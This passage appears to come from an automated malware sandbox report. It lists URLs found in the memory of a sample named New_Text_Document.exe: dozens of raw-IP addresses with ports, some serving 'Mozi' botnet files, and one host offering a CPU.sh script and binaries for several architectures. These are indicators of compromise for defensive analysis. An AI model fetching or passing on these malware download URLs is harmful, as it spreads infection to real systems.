                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.88.53.62:23006/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.96.33.83:5013/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.129.28.169:53184/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.110.124.47:50371/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.114.57.146:21474/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.115.161.70:11191/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.115.164.77:38803/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.115.174.187:54795/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.142.166.120:35818/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.99.97.16:49330/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.0.162.154:12535/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.105.131:49933/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.115.162:43992/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.117.242:4878/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.25.237:1723/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.59.55:23955/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.67.242:55882/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.1.8.129:48275/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.102.152.115:12343/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.102.168.189:17437/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.170.118.242:10885/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.19.194.37:49060/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.2.39.83:14189/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.2.86.113:9969/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.23.82.76:21483/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.31.40.7:50467/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.4.155.150:47247/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.4.234.131:57990/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.4.27.72:63961/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.6.97.68:56485/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.7.131.145:23251/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.8.8.225:54452/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.198.35.69:50556/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.198.53.14:46651/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.209.75.5:34741/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.214.86.80:39727/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.214.86.80:39727/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.246.119.253:16430/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.115.156.246:4875/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.154.46.158:24048/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.246.38.23:39986/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.247.183.18:3311/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.52.115.74:53263/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.54.70.1:55428/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.56.172.212:32221/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.56.182.81:4399/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.57.87.252:27600/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.57.95.40:11177/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.57.96.188:15642/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.58.165.59:61979/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.58.76.215:6638/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.58.79.90:60683/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.61.218.23:2581/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.63.109.189:23025/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.63.158.125:61992/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.70.0.22:51005/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.70.0.78:62859/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.70.133.75:30870/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.70.247.150:15406/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.84.192.85:8349/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.84.250.145:29083/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.85.171.104:55270/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.0.117.62:52545/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.122.96.35:56845/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.169.235.215:17145/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/CPU.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/a4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/a5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/a6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/a7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/i5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/i6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/mk
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/mps
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/msl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/pc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/srh
